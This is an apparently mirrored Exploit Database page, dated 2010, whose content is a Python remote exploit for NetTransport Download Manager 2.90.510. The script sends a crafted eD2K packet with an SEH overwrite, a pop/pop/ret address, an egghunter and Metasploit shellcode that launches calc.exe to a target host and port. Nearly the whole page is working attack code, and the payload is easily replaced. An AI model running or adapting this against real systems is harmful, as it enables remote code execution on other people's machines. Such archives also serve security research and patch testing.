NetTransport Download Manager 2.90.510 – Remote Overflow (SEH)

• Exploit Database
• 15 阅读

• 作者： Lincoln
  日期： 2010-01-02
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/10911/

• #!/usr/bin/python
  
  #########################
  #NetTransport Download Manager version:2.90.510 0day
  #Discovered by Lincoln
  #Tested on Windows XP SP3
  #
  #eMule file sharing protocol
  #SEH overwrite, leaves only 60 or so bytes after p/p/r
  #egghunter is used to find sc (calc.exe)
  #
  #root@BT4VM:~# ./netxfer.py 192.168.1.8 31491
  #########################
  
  import socket,sys
  
  host = sys.argv[1]
  port = int(sys.argv[2]) #eD2K port
  
  # * windows/exec - 200 bytes
  # * http://www.metasploit.com
  # * EXITFUNC=thread, CMD=calc.exe
  sc = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
  "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
  "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
  "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
  "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
  "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
  "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
  "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
  "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
  "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
  "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
  "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
  "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
  "\x2e\x65\x78\x65\x00")
  
  #magic packet
  buf = ("\xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24"
  "\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00"
  "\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00")
  
  #egg =c00lc00l
  egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
  "\x63\x30\x30\x6c\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
  
  #p/p/r 10002a57 libssl.dll
  buf+= "\x41" * 119 + "\xeb\x06\x90\x90" + "\x57\x2a\x00\x10" + "\x90" * 10 + egghunter
  buf+= "\x90" * 50 + "c00lc00l" + "\x90" * 20 + sc + "\x90" * 2000
  
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.send(buf)
  print "\nExploit Sent!! Give the egghunter a few seconds to find the shellcode\r\n"
  s.close()